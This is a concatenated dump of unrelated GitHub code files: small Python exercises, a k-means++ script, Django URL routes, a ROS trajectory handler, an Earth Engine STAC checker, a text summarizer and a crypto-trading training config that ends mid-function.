tf.test.main()\n","repo_name":"google-research/federated","sub_path":"multi_epoch_dp_matrix_factorization/dp_ftrl/centralized/gradient_processors_test.py","file_name":"gradient_processors_test.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","stars":610,"dataset":"github-code","pt":"83"} +{"seq_id":"30969399150","text":"album = [(\"Welcome to my Nightmare\", \"Alice Cooper\", 1975),\n (\"Bad Company\", \"Bad Company\", 1974),\n (\"Nightflight\", \"Budgie\", 1981),\n (\"More Mayhem\", \"Emilda May\", 2011),\n (\"Ride the Lightning\", \"Metallica\", 1984),\n ]\n # if the brackets are removed then the list will be 15\nprint(len(album))\nfor alb in album:\n print(\"Album: {}, Artist: {}, Year: {}\"\n .format(alb[0],alb[1],alb[2]))\n# or \nfor name,artist,year in album:\n print(\"Album: {}, Artist: {}, Year: {}\"\n .format(name,artist,year))\n","repo_name":"danielosibodu/PythonProjects","sub_path":"tuples_nested.py","file_name":"tuples_nested.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24306947028","text":"text = \"All smiles, I know what it takes to fool this town I'll do it 'til the sun goes down And all through the nighttime Oh, yeah Oh, yeah, I'll tell you what you wanna hear Leave my sunglasses on while I shed a tear It's never the right time Yeah, yeah \"\nprint(text.split())\nword_count = { }\nfor word in text.split():\n if word in word_count:\n word_count[word]+=1\n else:\n word_count[word] =1\n\n \nword_count0 = { }\nfor word in text.lower().split():\n if word in word_count:\n word_count0[word]+=1\n else:\n word_count0[word] =1 \n","repo_name":"GK3077/Lyric-Analyzer","sub_path":"lyric-analyzer.py","file_name":"lyric-analyzer.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40852943425","text":"# K-means ++\n\n# casual python implementation of k-means ++\n\nimport numpy as np\nimport random\nimport math\n\ndatafile = \"/Users/tunder/booknlp/normalizedcharacters.tsv\"\n\nwith open(datafile, encoding='utf-8') as f:\n filelines = f.readlines()\n\nterms = dict()\ntermindices = dict()\ndocuments = dict()\ndocindices = dict()\ndoccounter = 0\ntermcounter = 0\n\nthrottle = 1000000\n\nfor line in filelines[0:throttle]:\n line = line.rstrip()\n fields = line.split('\\t')\n\n doc = fields[0]\n term = fields[1]\n\n if doc not in docindices:\n docindices[doc] = doccounter\n documents[doccounter] = doc\n doccounter += 1\n\n if term not in termindices:\n termindices[term] = termcounter\n terms[termcounter] = term\n termcounter += 1\n\nD = doccounter\nV = termcounter\n\ntermdoc = np.zeros((V, D), dtype = 'float64')\n\nfor line in filelines[0:throttle]:\n line = line.rstrip()\n fields = line.split('\\t')\n\n docidx = docindices[fields[0]]\n termidx = termindices[fields[1]]\n count = float(fields[2])\n\n termdoc[termidx, docidx] = count\n\n\nfor i in range(D):\n termdoc[ : , i] = termdoc[ : , i] / np.sum(termdoc[ : , i])\n\n\ndef docvector(docidx):\n global termdoc\n return termdoc[ : , docidx]\n\ndef euclid(vectora, vectorb):\n assert len(vectora) == len(vectorb)\n return np.linalg.norm(vectora - vectorb)\n\ndef cossim(vectora, vectorb):\n numerator = np.dot(vectora, vectorb)\n denominator = np.linalg.norm(vectora) * np.linalg.norm(vectorb)\n if denominator == 0:\n return 0\n else:\n return numerator / denominator\n \n\nK = 10\n\ncentroids = np.zeros((K, V), dtype = 'float64')\n\nchosenpoints = list()\n\nrandom.seed()\nr = random.randrange(D)\nchosenpoints.append(r)\n\n# We only select starting centroids from a limited subset of chars.\n\nDsub = 12000\nif D < Dsub:\n Dsub = D\n\n# The range is k-1 because we already chose one at random.\n\nfor i in range(K - 1):\n distances = np.ones(Dsub) * 90000000\n\n for j in range(Dsub):\n\n for k in chosenpoints:\n thisdist = euclid(docvector(j), docvector(k))\n if thisdist < distances[j]:\n distances[j] = thisdist\n\n distances = distances / np.sum(distances)\n\n r = random.random()\n traversed = 0\n chosen = 0\n\n for j in range(Dsub):\n traversed += distances[j]\n if r <= traversed:\n chosen = j\n break\n\n chosenpoints.append(chosen)\n print(\"Formed cluster #\" + str(i))\n\nfor idx, point in enumerate(chosenpoints):\n centroids[idx, : ] = docvector(point)\n\n# Main k-means loop\n\nitermax = 25\n\ndivisors = np.ones((K))\n \nfor iteration in range(itermax):\n\n print(\"Iteration #\" + str(iteration))\n\n pointassignments = np.ones((D)) * -1\n\n for i in range(D):\n\n mindist = 90000000\n closest = -1\n\n for j in range(K):\n\n thisdist = euclid(docvector(i), centroids[j, :]) * divisors[j]\n\n if thisdist < mindist:\n mindist = thisdist\n closest = j\n\n if closest > -1:\n pointassignments[i] = closest\n else:\n print(\"Error in point assignment: mindist not found.\")\n\n assert len(pointassignments) == D\n\n sizes = list()\n \n for j in range(K):\n\n members = np.where(pointassignments == j)[0]\n sizes.append(len(members))\n \n if len(members) < 1:\n print(\"Cluster lacks members: reassignment\")\n members = [random.randrange(D)]\n\n newcentroid = np.zeros((V))\n\n for member in members:\n newcentroid = newcentroid + docvector(member)\n\n newcentroid = newcentroid / len(members)\n\n centroids[j, : ] = newcentroid\n\n print(sizes)\n for j in range(K):\n divisors[j] = divisors[j] + (math.log(sizes[j] + 1) / 1000)\n\nmeancentroid = np.zeros((V))\n\nfor j in range(K):\n meancentroid = meancentroid + (centroids[j, :] * sizes[j])\nmeancentroid = meancentroid / D\n\noverrepresentation = np.zeros((K, V))\n\nfor j in range(K):\n difference = centroids[j, :] - meancentroid\n orderedindices = difference.argsort()\n print(\"Cluster \" + str(j))\n\n for termidx in orderedindices[-20:]:\n print(terms[termidx])\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"tedunderwood/GenreProject","sub_path":"python/utilities/kmeansplus.py","file_name":"kmeansplus.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"29021147895","text":"from django.urls import path\r\nfrom .views import *\r\n\r\nurlpatterns = [\r\n path('group/get/', group_view, name='get_group_view'),\r\n path('group/create/', group_view, name='create_group_view'),\r\n path('group/update//', group_view, name='update_group_view'),\r\n path('group/delete//', group_view, name='delete_group_view'),\r\n path('group/get//', group_view, name='get_one_group_view'),\r\n\r\n path('create/', task_view, name='create_task_view'),\r\n path('get/', get_task_view, name='get_task_view'),\r\n path('get//', get_task_view, name='get_one_task_view'),\r\n path('update//', task_view, name='update_task_view'),\r\n path('delete//', task_view, name='delete_task_view'),\r\n\r\n path('comment/create/', task_comment_view, name=\"create_task_comment_view\"),\r\n path('comment/get/', task_comment_view, name=\"get_task_comment_view\"),\r\n path('comment/update//', task_comment_view, name=\"update_task_comment_view\"),\r\n path('comment/delete//', task_comment_view, name=\"delete_task_comment_view\"),\r\n\r\n path('file-management/create/', task_file_management_view, name=\"create_task_file_management_view\"),\r\n path('file-management/get/', task_file_management_view, name=\"get_task_file_management_view\"),\r\n path('file-management/delete//', task_file_management_view, name=\"delete_task_file_management_view\"),\r\n path('file-management/get//', task_file_management_view, name=\"get_one_task_file_management_view\"),\r\n\r\n path('reassign//', reassign_task_view, name='reassign_task_view'),\r\n path('log-activity/get/', task_log_activity_view, name='task_log_activity_view'),\r\n]\r\n","repo_name":"lokeshsahu01/connect_globes","sub_path":"PLR_APIs/TMS/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18010060609","text":"#! /usr/bin/env python3\n\nimport rospy\nfrom geometry_msgs.msg import Pose, Twist, PoseArray, PoseStamped, TwistStamped, Transform, Vector3\nfrom nav_msgs.msg import Path\nfrom trajectory_msgs.msg import MultiDOFJointTrajectory, MultiDOFJointTrajectoryPoint\nfrom tricopter.srv import *\nfrom viz_functions import *\n\nclass trajectoryHandler:\n def __init__(self, frequency, max_vel, max_acc, max_yawrate, max_yawrate_dot):\n self.frequency = frequency\n self.max_vel = max_vel\n self.max_acc = max_acc\n self.max_yawrate = max_yawrate\n self.max_yawrate_dot = max_yawrate_dot\n self.waypoint_prefix = \"waypoints\"\n self.print_frame_id = \"stewart_base\"\n\n self._point_count = 0 \n self._tooltip_trajectory = MultiDOFJointTrajectory()\n\n self._n_layers = rospy.get_param(str(self.waypoint_prefix)+'/n_layers')\n\n # publishers for visualisation only\n self._pub_toolpath_viz = rospy.Publisher('/viz/toolpath', Path, queue_size=1)\n self._pub_print_viz = rospy.Publisher('/viz/print', Path, queue_size=1) \n\n # publish print visualisation periodically\n rospy.Timer(rospy.Duration(5.0), self._viz_timer_cb, reset=True)\n\n def follow_print_trajectory(self):\n header = self._tooltip_trajectory.header\n \n tooltip_pose = PoseStamped(header=header)\n tooltip_velocity = TwistStamped(header=header)\n tooltip_acceleration = TwistStamped(header=header)\n\n if self._point_count < len(self._tooltip_trajectory.points): \n tooltip_pose, tooltip_velocity, tooltip_acceleration = self._read_trajectory(self._tooltip_trajectory, self._point_count)\n self._point_count += 1\n complete = False\n else: \n complete = True\n self._point_count = 0\n \n return tooltip_pose, tooltip_velocity, tooltip_acceleration, complete\n\n def generate_print_layer(self, layer_number):\n self._point_count = 0 #ensure point count is reset in case last trajectory was interrupted\n print_waypoints = self._fetch_waypoints_from_yaml(layer_number)\n self._tooltip_trajectory = self._TOPPRA_interpolation(print_waypoints)\n publish_viz_trajectory(self._tooltip_trajectory, self._pub_toolpath_viz)\n # return drone_trajectory, tooltip_trajectory\n\n def _read_trajectory(self, trajectory, point_num):\n pose = PoseStamped()\n velocity = TwistStamped()\n acceleration = TwistStamped() \n pose.header.stamp = rospy.Time.now()\n pose.header.frame_id = trajectory.header.frame_id\n velocity.header = pose.header\n acceleration.header = pose.header\n pose.pose.position = trajectory.points[point_num].transforms[0].translation\n pose.pose.orientation = trajectory.points[point_num].transforms[0].rotation\n velocity.twist = trajectory.points[point_num].velocities[0]\n acceleration.twist = trajectory.points[point_num].accelerations[0]\n return pose, velocity, acceleration\n\n def _fetch_waypoints_from_yaml(self, layer_number):\n # get poses from file\n rospy.wait_for_service('fetch_poses')\n get_poses = rospy.ServiceProxy('fetch_poses', fetchPoses)\n request = fetchPosesRequest()\n request.prefix = self.waypoint_prefix\n request.frame_id = self.print_frame_id\n request.layer_number = layer_number\n response = get_poses(request)\n return response.poses\n\n def _TOPPRA_interpolation(self, poses):\n #interpolate with TOPPRA\n rospy.wait_for_service('get_TOPPRA_trajectory')\n get_traj = rospy.ServiceProxy('get_TOPPRA_trajectory', TOPPRATrajectory)\n request = TOPPRATrajectoryRequest()\n request.frequency = self.frequency\n request.max_vel = self.max_vel\n request.max_acc = self.max_acc\n request.max_yawrate = self.max_yawrate\n request.max_yawrate_dot = self.max_yawrate_dot\n request.poses = poses\n response = get_traj(request)\n return response.trajectory\n\n def _viz_timer_cb(self, event):\n publish_viz_print(self._pub_print_viz)","repo_name":"lachie-aerialrobotics/delta_2","sub_path":"scripts/trajectories/trajectory_handler.py","file_name":"trajectory_handler.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73423998351","text":"from django.conf import settings\n\n# Number of messages to display per page.\nMESSAGES_PER_PAGE = getattr(settings, 'ROSETTA_MESSAGES_PER_PAGE', 10)\n\n\n# Enable Google translation suggestions\nENABLE_TRANSLATION_SUGGESTIONS = getattr(settings, 'ROSETTA_ENABLE_TRANSLATION_SUGGESTIONS', False)\n# Can be obtained for free here: https://ssl.bing.com/webmaster/Developers/AppIds/\nBING_APP_ID = getattr(settings, 'BING_APP_ID', None)\n\n# Displays this language beside the original MSGID in the admin\nMAIN_LANGUAGE = getattr(settings, 'ROSETTA_MAIN_LANGUAGE', None)\n\n# Change these if the source language in your PO files isn't English\nMESSAGES_SOURCE_LANGUAGE_CODE = getattr(settings, 'ROSETTA_MESSAGES_SOURCE_LANGUAGE_CODE', 'en')\nMESSAGES_SOURCE_LANGUAGE_NAME = getattr(settings, 'ROSETTA_MESSAGES_SOURCE_LANGUAGE_NAME', 'English')\n\n\n\"\"\"\nWhen running WSGI daemon mode, using mod_wsgi 2.0c5 or later, this setting\ncontrols whether the contents of the gettext catalog files should be\nautomatically reloaded by the WSGI processes each time they are modified.\n\nNotes:\n\n * The WSGI daemon process must have write permissions on the WSGI script file\n (as defined by the WSGIScriptAlias directive.)\n * WSGIScriptReloading must be set to On (it is by default)\n * For performance reasons, this setting should be disabled in production environments\n * When a common rosetta installation is shared among different Django projects,\n each one running in its own distinct WSGI virtual host, you can activate\n auto-reloading in individual projects by enabling this setting in the project's\n own configuration file, i.e. in the project's settings.py\n\nRefs:\n\n * http://code.google.com/p/modwsgi/wiki/ReloadingSourceCode\n * http://code.google.com/p/modwsgi/wiki/ConfigurationDirectives#WSGIReloadMechanism\n\n\"\"\"\nWSGI_AUTO_RELOAD = getattr(settings, 'ROSETTA_WSGI_AUTO_RELOAD', False)\nUWSGI_AUTO_RELOAD = getattr(settings, 'ROSETTA_UWSGI_AUTO_RELOAD', False)\n\n\n# Exclude applications defined in this list from being translated\nEXCLUDED_APPLICATIONS = getattr(settings, 'ROSETTA_EXCLUDED_APPLICATIONS', ())\n\n","repo_name":"evrenesat/ganihomes","sub_path":"rosetta/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"83"} +{"seq_id":"3696659374","text":"import abc\nimport typing\n\nimport pandas as pd\nimport pandas_ta\n\nfrom . import human, vectorbt, logic, traversers, quantconnect\n\n\nclass Transpiler():\n @abc.abstractstaticmethod\n def convert_to_string(cls, root_node: dict) -> str:\n raise NotImplementedError()\n\nclass HumanTextTranspiler():\n @staticmethod\n def convert_to_string(root_node: dict) -> str:\n return human.convert_to_pretty_format(root_node)\n\nclass QuantConnectTranspiler():\n @staticmethod\n def convert_to_string(root_node: dict) -> str:\n return quantconnect.output_strategy(root_node)\n\n\n#\n# TODO: include this inside vectorbt output\n#\ndef precompute_indicator(close_series: pd.Series, indicator: str, window_days: int):\n close = close_series.dropna()\n if indicator == logic.ComposerIndicatorFunction.CUMULATIVE_RETURN:\n # because comparisons will be to whole numbers\n return close.pct_change(window_days) * 100\n elif indicator == logic.ComposerIndicatorFunction.MOVING_AVERAGE_PRICE:\n return pandas_ta.sma(close, window_days)\n elif indicator == logic.ComposerIndicatorFunction.RSI:\n return pandas_ta.rsi(close, window_days)\n elif indicator == logic.ComposerIndicatorFunction.EMA_PRICE:\n return pandas_ta.ema(close, window_days)\n elif indicator == logic.ComposerIndicatorFunction.CURRENT_PRICE:\n return close_series\n elif indicator == logic.ComposerIndicatorFunction.STANDARD_DEVIATION_PRICE:\n return pandas_ta.stdev(close, window_days)\n elif indicator == logic.ComposerIndicatorFunction.STANDARD_DEVIATION_RETURNS:\n return pandas_ta.stdev(close.pct_change() * 100, window_days)\n elif indicator == logic.ComposerIndicatorFunction.MAX_DRAWDOWN:\n # this seems pretty close\n maxes = close.rolling(window_days, min_periods=1).max()\n downdraws = (close/maxes) - 1.0\n return downdraws.rolling(window_days, min_periods=1).min() * -100\n elif indicator == logic.ComposerIndicatorFunction.MOVING_AVERAGE_RETURNS:\n return close.pct_change().rolling(window_days).mean() * 100\n else:\n raise NotImplementedError(\n \"Have not implemented indicator \" + indicator)\n\n\nclass VectorBTTranspiler():\n @staticmethod\n def convert_to_string(root_node: dict) -> str:\n return vectorbt.convert_to_vectorbt(root_node)\n\n @staticmethod\n def execute(root_node: dict, closes: pd.DataFrame) -> typing.Tuple[pd.DataFrame, pd.DataFrame]:\n code = VectorBTTranspiler.convert_to_string(root_node)\n locs = {}\n exec(code, None, locs)\n build_allocations_matrix = locs['build_allocations_matrix']\n\n allocations, branch_tracker = build_allocations_matrix(closes)\n\n allocateable_tickers = traversers.collect_allocateable_assets(\n root_node)\n\n # remove tickers that were never intended for allocation\n for reference_only_ticker in [c for c in allocations.columns if c not in allocateable_tickers]:\n del allocations[reference_only_ticker]\n\n allocations_possible_start = closes[list(\n allocateable_tickers)].dropna().index.min().date()\n # truncate until allocations possible (branch_tracker is not truncated)\n allocations = allocations[allocations.index.date >=\n allocations_possible_start]\n\n return allocations, branch_tracker\n\n\ndef main():\n from . import symphony_object, get_backtest_data\n\n symphony_id = \"KvA0KYc57MQSyykdWcFs\"\n symphony = symphony_object.get_symphony(symphony_id)\n root_node = symphony_object.extract_root_node_from_symphony_response(\n symphony)\n\n print(HumanTextTranspiler.convert_to_string(root_node))\n print(VectorBTTranspiler.convert_to_string(root_node))\n\n tickers = traversers.collect_referenced_assets(root_node)\n\n closes = get_backtest_data.get_backtest_data(tickers)\n\n #\n # Execute logic\n #\n allocations, branch_tracker = VectorBTTranspiler.execute(\n root_node, closes)\n\n backtest_start = allocations.dropna().index.min().date()\n\n allocations_aligned = allocations[allocations.index.date >= backtest_start]\n branch_tracker_aligned = branch_tracker[branch_tracker.index.date >= backtest_start]\n\n assert len(allocations_aligned) == len(branch_tracker_aligned)\n\n print(allocations_aligned[(\n allocations_aligned.sum(axis=1) - 1).abs() > 0.0001])\n branches_by_failed_allocation_days = branch_tracker_aligned[(\n allocations_aligned.sum(axis=1) - 1).abs() > 0.0001].sum(axis=0)\n branches_with_failed_allocation_days = branches_by_failed_allocation_days[\n branches_by_failed_allocation_days != 0].index.values\n\n for branch_id in branches_with_failed_allocation_days:\n print(f\" -> id={branch_id}\")\n print(allocations_aligned[branch_tracker_aligned[branch_id] == 1])\n","repo_name":"androslee/compose_symphony_parser","sub_path":"lib/transpilers.py","file_name":"transpilers.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"83"} +{"seq_id":"44068141645","text":"'''\nZałóżmy, że podatek dochodowy wyliczany jest według następujących stawek:\n-Przychody do 4000 zł nie są opodatkowane. \n-Przychody pomiędzy 4000 a 90000 zł są objęte stawką 20% podatku.\n-Przychody powyżej 90000 zł objęte są stawką 30% podatku. \nNapisz program, który dla podanej (w zł) kwoty obliczy należny podatek dochodowy.\nW swoim rozwiązaniu wyszczególnij:\n-funkcję czy_poprawny(), która jako argument przyjmuje wysokość dochodu i\nzwraca prawdę lub fałsz w zależności od tego czy odchód nie jest ujemny;\nfunkcję wylicz_podatek(), która przyjmuje jako argumenty wysokość dochodu oraz\nstawkę procentową podatku, a zwraca wyskość podatku\n-funkcję main(), w której przeprowadzisz interakcję z uzytkownikiem - pobierzesz\nod niego dane o wysokości podatku i sprawdzisz jego poprawność, a następnie\ngdy wszystko będzie ok to za pomocą odpowiednich instrukcji\nwarunkowych wyznaczysz stawkę podatku, na koniec wylicz podatek dochodowy\nkorzystając ze swojej funkcji wylicz_podatek() i wypisz na ekranie komunikat\nile on wynosi. Pamiętaj aby wypisać komunikat o niepoprawnych danych!\nRozwiązanie załącz w postaci pliku *.py.\n'''\n\ndef wylicz_podatek(dochod, stawka):\n return dochod * stawka\ndef czy_poprawny(c):\n if c >= 0:\n return True\n return False\ndef main():\n d = float(input('Podaj swój dochód: '))\n if czy_poprawny(d):\n if d <= 4000:\n p = wylicz_podatek(d, 0)\n elif d > 4000 and d <= 90000:\n p = wylicz_podatek(d, 0.2)\n else:\n p = wylicz_podatek(d, 0.3)\n print(\"Podatek od dochodu\", d,\"zł wyniesie\", p, \"zł.\")\n else:\n print(\"Dochód nie może być ujemny!\")\nmain()\n \n","repo_name":"majsylw/Introduction-to-programming-in-python","sub_path":"Laboratory 07/1 - Powtórzenie-podatek.py","file_name":"1 - Powtórzenie-podatek.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"42508404321","text":"from math import sqrt\nfrom sys import stdin \n\nn=int(stdin.readline())\ngraph=[[] for i in range(n)]\ndp=[[1000000000]*(1< UNKNOWN PATH')\n\n# List loaded from non_commercial_datasets.jsonnet\nNON_COMMERCIAL_LIST = []\n\nSKIP_FEATUREVIEW_GENERATION = 'gee:skip_featureview_generation'\n\nCHECKER_CODE_ROOT = 'https://github.com/google/earthengine-catalog/blob/main'\n\n# Legacy id for a top-level dataset\nFIRMS = 'FIRMS'\n\n\n_StrEnum = (\n (enum.StrEnum,) if sys.version_info[:2] >= (3, 11) else (str, enum.Enum)\n)\n\n\nclass StacType(*_StrEnum):\n CATALOG = 'Catalog'\n COLLECTION = 'Collection'\n\n\nclass GeeType(*_StrEnum):\n IMAGE = 'image'\n IMAGE_COLLECTION = 'image_collection'\n TABLE = 'table'\n TABLE_COLLECTION = 'table_collection'\n # For catalogs\n NONE = 'none'\n\n\ndef data_root() -> pathlib.Path:\n return (\n pathlib.Path(os.path.dirname(__file__)) /\n '..')\n\n\ndef stac_root() -> pathlib.Path:\n return data_root() / 'catalog'\n\n\ndef examples_root() -> pathlib.Path:\n # First try for a local path for bazel.\n path = pathlib.Path('examples')\n if path.is_dir(): return path\n\n # blaze has Fileset support\n return data_root() / 'examples/javascript_examples'\n\n\ndef previews_root() -> pathlib.Path:\n # First try for a local path for bazel.\n path = pathlib.Path('examples')\n if path.is_dir(): return path\n\n # blaze has Fileset support\n return data_root() / 'examples/javascript_previews'\n\n\ndef url_id_for_dataset_id(dataset_id: str) -> str:\n \"\"\"Converts a dataset id into a string suitable for use in a URL.\"\"\"\n assert dataset_id\n return dataset_id.replace('/', '_')\n\n\n@dataclasses.dataclass\nclass Node:\n \"\"\"Container for one STAC Catalog or STAC Collection.\"\"\"\n id: str\n path: pathlib.Path\n type: StacType\n gee_type: GeeType\n stac: dict[str, object] # The result of json.load\n\n\nclass IssueLevel(*_StrEnum):\n \"\"\"How serious is an issue.\"\"\"\n WARNING = 'warning'\n ERROR = 'error'\n\n\n@dataclasses.dataclass\nclass Issue:\n \"\"\"A record of one issue found in a STAC node.\"\"\"\n id: str\n path: pathlib.Path\n check_name: str\n message: str\n level: IssueLevel = IssueLevel.ERROR\n\n def __str__(self):\n return (\n f'Issue(\\'{self.id}\\', \\'{str(self.path)}\\', \\'{self.check_name}\\', '\n f'\\'{self.message}\\', IssueLevel.{self.level})')\n\n\nclass Check:\n \"\"\"Parent class for all checks.\"\"\"\n name: str = 'unknown'\n\n @classmethod\n def new_issue(cls,\n node: Node,\n message: str,\n level: IssueLevel = IssueLevel.ERROR) -> Issue:\n \"\"\"Creates a new Issue for the given arguments.\"\"\"\n\n # Find the relative path to the checker that produced the error.\n relative_path = []\n for component in reversed(cls.__module__.split('.')):\n if component == 'earthengine_catalog':\n break\n relative_path.insert(0, component)\n module = '/'.join(relative_path)\n link = f'{CHECKER_CODE_ROOT}/{module}.py'\n # Changing the checker filename to have extension .jsonnet rather than .json\n return Issue(\n node.id, node.path.with_suffix('.jsonnet'), link, message, level\n )\n\n\nclass NodeCheck(Check):\n \"\"\"One node check.\"\"\"\n\n @classmethod\n def run(cls, node: Node) -> Iterator[Issue]:\n raise NotImplementedError\n\n\nclass TreeCheck(Check):\n \"\"\"One tree check.\"\"\"\n\n @classmethod\n def run(cls, nodes: list[Node]) -> Iterator[Issue]:\n raise NotImplementedError\n\n\n# TODO(schwehr): Allow a list of regex for the ids.\ndef load(root: pathlib.Path) -> list[Node]:\n \"\"\"Returns a list of Nodes.\"\"\"\n root_len = len(root.parts)\n nodes: list[Node] = []\n for path in root.rglob('*.json'):\n relative_path = pathlib.Path(*path.parts[root_len:])\n\n stac = json.loads(path.read_text())\n dataset_id = stac.get('id', UNKNOWN_ID + str(relative_path))\n asset_type = stac.get(TYPE)\n\n gee_type_str = stac.get(GEE_TYPE)\n gee_type: Optional[GeeType]\n try:\n gee_type = GeeType(gee_type_str)\n except ValueError:\n gee_type = GeeType.NONE\n nodes.append(Node(dataset_id, relative_path, asset_type, gee_type, stac))\n return nodes\n\n\ndef is_in_non_commercial(dataset_id: str) -> bool:\n global NON_COMMERCIAL_LIST\n if not NON_COMMERCIAL_LIST:\n non_commerical_file = data_root() / 'non_commercial_datasets.json'\n NON_COMMERCIAL_LIST = json.loads(non_commerical_file.read_text())\n return dataset_id in NON_COMMERCIAL_LIST\n","repo_name":"google/earthengine-catalog","sub_path":"checker/stac.py","file_name":"stac.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"83"} +{"seq_id":"23638729591","text":"#\n# By Sofia Sorokina, August 2021\n#\nfrom __future__ import absolute_import\nfrom __future__ import division, print_function, unicode_literals\n\nfrom sumy.parsers.html import HtmlParser\nfrom sumy.parsers.plaintext import PlaintextParser\nfrom sumy.nlp.tokenizers import Tokenizer\nfrom sumy.summarizers.lsa import LsaSummarizer as Summarizer\nfrom sumy.nlp.stemmers import Stemmer\nfrom sumy.utils import get_stop_words\n\nLANGUAGE = \"english\"\nSENTENCES_COUNT = 5\n\nif __name__ == \"__main__\":\n for x in range(1,4):\n for y in [\"Order\", \"Random\"]:\n #read the all tweets file and perform summarization\n i = str(x)\n\n parser = PlaintextParser.from_file(\"TwitterData/run\"+i+\"/\" +y+\"AllTweets\"+i+\".txt\", Tokenizer(LANGUAGE))\n stemmer = Stemmer(LANGUAGE)\n summarizer = Summarizer(stemmer)\n summarizer.stop_words = get_stop_words(LANGUAGE)\n line = \"\"\n\n #create a new file for summary based on tweets to be stored in\n open(\"SUMY-summaries/\"+y+\"Summary\"+i+\".txt\",\"w\")\n print(\"========= Summary \"+y+\" \"+i+\" =========\")\n for sentence in summarizer(parser.document, SENTENCES_COUNT):\n print(sentence)\n line += (str(sentence) + \". \")\n print(\"========= End of summary \"+y+\" \"+i+\" =========\\n\")\n\n f= open(\"SUMY-summaries/\"+y+\"Summary\"+i+\".txt\",\"a\")\n f.write(line[:-1])","repo_name":"SofiaSorokina/DialectFairnessMetrics","sub_path":"SofiaMetrics/SUMY-Bot/SUMY-Bot.py","file_name":"SUMY-Bot.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37140124259","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\")\ninput = sys.stdin.readline\n\nSZ = 10000001\n\n\ndef cnt_primelike(p, L, R):\n cnt = 0\n num = p ** 2\n while num < L:\n num *= p\n while num <= R:\n cnt += 1\n R = num * p\n return cnt\n\n\nif __name__ == \"__main__\":\n is_prime = [True for _ in range(SZ)]\n for i in range(2, SZ):\n for j in range(i + i, SZ, i):\n if not is_prime[i]: continue\n\n is_prime[j] = False\n\n primes = []\n for i in range(2, SZ):\n if is_prime[i]:\n primes.append(i)\n\n L, R = map(int, input().rstrip().split())\n cnt = 0\n for i in range(len(primes)):\n if primes[i] ** 2 > R:\n break\n\n cnt += cnt_primelike(primes[i], L, R)\n print(cnt)\n","repo_name":"AlphaTechnic/Algorithm_Study","sub_path":"2021_random_set_self_practice/using_python/1465.py","file_name":"1465.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5056981062","text":"\"\"\"\nThis code defines various settings and functions for training a machine learning model.\n\nThe trade start date in combinations with the amount of candles required for training and validation determine all\nother parameters automatically.\n\nThe function nCr calculates the number of ways to choose r elements from a set of n elements, also known as a combination.\n\nThe settings defined in this script include the random seed SEED_CFG, the time frame TIMEFRAME,\nthe number of trials H_TRIALS,\nthe number of groups used for testing K_TEST_GROUPS,\nthe number of paths NUM_PATHS,\nthe number of K-fold cross validation groups KCV_groups\nthe number of groups N_GROUPS,\nthe number of splits NUMBER_OF_SPLITS,\nthe start and end date for the trade period trade_start_date\nthe trade_end_date,\nthe number of candles for training no_candles_for_train\nthe validation no_candles_for_val\nthe list of tickers TICKER_LIST,\nthe minimum buy limits ALPACA_LIMITS,\nthe list of technical indicators TECHNICAL_INDICATORS_LIST.\n\nThe function calculate_start_end_dates is used to compute the start and end dates for training and validation based on the number of candles and the selected time frame.\n\n\"\"\"\n\nfrom datetime import datetime, timedelta\nimport numpy as np\nimport operator as op\nfrom functools import reduce\n\n\ndef nCr(n, r):\n r = min(r, n-r)\n numer = reduce(op.mul, range(n, n-r, -1), 1)\n denom = reduce(op.mul, range(1, r+1), 1)\n return numer // denom # or / in Python 2\n\n\n# General Training Settings\n#######################################################################################################\n#######################################################################################################\n\ntrade_start_date = '2022-04-30 00:00:00'\ntrade_end_date = '2022-06-27 00:00:00'\n\nSEED_CFG = 2390408\nTIMEFRAME = '5m'\nH_TRIALS = 50\nKCV_groups = 5\nK_TEST_GROUPS = 2\nNUM_PATHS = 4\nN_GROUPS = NUM_PATHS + 1\nNUMBER_OF_SPLITS = nCr(N_GROUPS, N_GROUPS - K_TEST_GROUPS)\n\nprint(NUMBER_OF_SPLITS)\n\nno_candles_for_train = 20000\nno_candles_for_val = 5000\n\nTICKER_LIST = ['AAVEUSDT',\n 'AVAXUSDT',\n 'BTCUSDT',\n 'NEARUSDT',\n 'LINKUSDT',\n 'ETHUSDT',\n 'LTCUSDT',\n 'MATICUSDT',\n 'UNIUSDT',\n 'SOLUSDT',\n ]\n\n\n# Minimum buy limits\nALPACA_LIMITS = np.array([0.01,\n 0.10,\n 0.0001,\n 0.1,\n 0.1,\n 0.001,\n 0.01,\n 10,\n 0.1,\n 0.01\n ])\n\n\nTECHNICAL_INDICATORS_LIST = ['open',\n 'high',\n 'low',\n 'close',\n 'volume',\n 'macd',\n 'macd_signal',\n 'macd_hist',\n 'rsi',\n 'cci',\n 'dx'\n ]\n\n\n# Auto compute all necessary dates based on candle distribution\n#######################################################################################################\n#######################################################################################################\n\ndef calculate_start_end_dates(candlewidth):\n no_minutes 